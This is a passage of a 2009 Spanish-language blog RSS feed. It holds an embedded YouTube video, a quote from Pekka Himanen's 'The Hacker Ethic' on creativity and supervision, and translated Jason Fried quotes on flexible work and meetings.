		<guid isPermaLink="false">http://www.patriciomolina.com/?p=253</guid>
		<description><![CDATA[
]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="384" height="313" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/uvPIz296js4&amp;hl=en_US&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="384" height="313" src="http://www.youtube.com/v/uvPIz296js4&amp;hl=en_US&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2009/12/este-pibe-es-un-fenomeno/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>La cultura de la supervisión y la creatividad</title>
		<link>http://www.patriciomolina.com/2009/11/la-cultura-de-la-supervision-y-la-creatividad/</link>
		<comments>http://www.patriciomolina.com/2009/11/la-cultura-de-la-supervision-y-la-creatividad/#comments</comments>
		<pubDate>Sun, 29 Nov 2009 00:18:15 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Citas]]></category>
		<category><![CDATA[capitalismo]]></category>
		<category><![CDATA[ética hacker]]></category>
		<category><![CDATA[pekka himanen]]></category>

		<guid isPermaLink="false">http://www.patriciomolina.com/?p=248</guid>
		<description><![CDATA[La fuente de productividad más importante en la economía de la información es la creatividad, y no es posible crear algo interesante si la premura de tiempo es constante o debe realizarse de una forma regulada de nueve a cinco. De modo que, aun cuando sea sólo por razones estrictamente económicas, es importante permitir la [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>La fuente de productividad más importante en la economía de la información es la creatividad, y no es posible crear algo interesante si la premura de tiempo es constante o debe realizarse de una forma regulada de nueve a cinco. De modo que, aun cuando sea sólo por razones estrictamente económicas, es importante permitir la presencia de la dimensión lúdica y de los estilos individuales de creatividad dado que, en la economía  de la información, la cultura de la supervisión acaba por volverse con suma facilidad en contra de los objetivos ambicionados.</p></blockquote>
<p style="text-align: right;"><a href="http://es.wikipedia.org/wiki/Pekka_Himanen">Pekka Himanen</a> en &#8220;<a href="http://es.wikipedia.org/wiki/La_%C3%A9tica_del_hacker_y_el_esp%C3%ADritu_de_la_era_de_la_informaci%C3%B3n">La ética del hacker y el espíritu de la era de la información</a>&#8220;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2009/11/la-cultura-de-la-supervision-y-la-creatividad/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8220;Odio que las empresas traten a sus empleados como niños&#8221;</title>
		<link>http://www.patriciomolina.com/2009/11/odio-que-las-empresas-traten-a-sus-empleados-como-ninos/</link>
		<comments>http://www.patriciomolina.com/2009/11/odio-que-las-empresas-traten-a-sus-empleados-como-ninos/#comments</comments>
		<pubDate>Tue, 17 Nov 2009 16:40:19 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Citas]]></category>

		<guid isPermaLink="false">http://www.patriciomolina.com/?p=236</guid>
		<description><![CDATA[Les recomiendo un interesantísimo artículo de Jason Fried1, CEO de 37signals.
Los empleados vienen a la oficina cuando quieren, o de lo contrario trabajan desde sus casas. No creo en la semana laboral de 40 horas, así que dejamos esa boludez sobre estar en algún lugar cierta cantidad de horas. No tengo idea cuántas horas trabajan [...]]]></description>
			<content:encoded><![CDATA[<p>Les recomiendo un <a href="http://www.inc.com/magazine/20091101/the-way-i-work-jason-fried-of-37signals.html">interesantísimo artículo de Jason Fried</a><sup>1</sup>, CEO de <a href="http://37signals.com/">37signals</a>.</p>
<blockquote><p>Los empleados vienen a la oficina cuando quieren, o de lo contrario trabajan desde sus casas. No creo en la semana laboral de 40 horas, así que dejamos esa boludez sobre estar en algún lugar cierta cantidad de horas. No tengo idea cuántas horas trabajan mis empleados &#8212; sólo sé que cumplen con su trabajo.</p></blockquote>
<blockquote><p>Me molesta bastante que la definición de éxito haya cambiado de ganancias a seguidores, amigos y suscriptores. Esta mierda no significa nada. Los chicos salen de la facultad pensando &#8220;quiero crear el próximo YouTube o Facebook&#8221;. Si un restaurante sirve más comida que los demás pero pierden plata en cada cena, es un negocio exitoso? No. Pero en Internet, por alguna razón, si tenés más usuarios que los demás, sos exitoso. No, no lo sos.</p></blockquote>
<blockquote><p>En el mundo de los negocios, las personas son propietarias &#8212; tienen miedo de compartir.</p></blockquote>
<blockquote><p>Raramente tenemos reuniones. Las odio. Son una gran pérdida de tiempo, y son costosas. No es una hora: son 10, porque arrastrás a 10 personas lejos de su verdadero trabajo</p></blockquote>
<blockquote><p>Odio que las empresas traten a sus empleados como niños. Bloquean Facebook o YouTube porque quieren que sus empleados trabajen ocho horas diarias. Pero en vez de obtener más productividad, obtenés frustración. Cuál es el punto? Mientras el trabajo se cumpla, no me importa lo que la gente hace durante el día.</p></blockquote>
<p><small><sup>1</sup> las ideas son de Jason, pero lo escribió Liz Welch</small></p>
]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2009/11/odio-que-las-empresas-traten-a-sus-empleados-como-ninos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
